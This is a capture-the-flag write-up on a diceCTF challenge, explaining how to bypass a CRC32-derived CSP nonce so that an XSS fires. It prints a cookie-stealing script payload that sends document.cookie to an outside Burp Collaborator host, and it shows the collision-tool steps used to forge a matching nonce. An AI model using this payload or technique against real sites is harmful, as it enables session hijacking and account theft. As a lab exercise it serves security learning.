Tags: csp-bypass crc32 csp xss 

Rating: 5.0

The source code of the application was the following:

<h1>Hello, !</h1>
<h3>Enter your name:</h3>
<form method="GET">
<input type="text" placeholder="name" name="name" />
<input type="submit" />


To trigger the XSS via the name GET parameter we need to craft a payload that contains the nonce that the CRC32 hash will produce in order to bypass the CSP.

The payload I started with was the following:
<script nonce="f4dbdf21">document.location="https://dn4omcrpw9pp7dzp0nbqrm26fxlo9ex3.oastify.com?"+document.cookie</script>

If this runs on the admin bot, it will send his cookie to our server (burp collaborator in this case), we just have to find a way to generate a payload that contains the resulting CRC32 hash in it.

To do this I've used the following tool [https://github.com/bediger4000/crc32-file-collision-generator](https://github.com/bediger4000/crc32-file-collision-generator)

$ ./matchfile target.txt payload.txt
File to match has length 1, CRC32 value f4dbdf21
File to get to match has length 123, CRC32 value be257358
Bytes to match: d2f4aa26
26 aa f4 d2

The target.txt just had a 0 in it (CRC32 hash: f4dbdf21) and the payload.txt had the payload text you saw earlier.
To make the payload produce the target CRC32 hash we just have to append the bytes that the tool generated to the end of it.

Now if we perform the following request (notice the 4 bytes at the end URL encoded):

The CSP will be bypassed due to the matching nonce and we will trigger the XSS.

Sending this URL for the admin bot to open will result in the admin sending his cookie to our target location:
GET /?flag=diceCTF{h0pe_that_d1dnt_take_too_l0ng} HTTP/1.1

Original writeup (https://youtu.be/7077pH14-kE).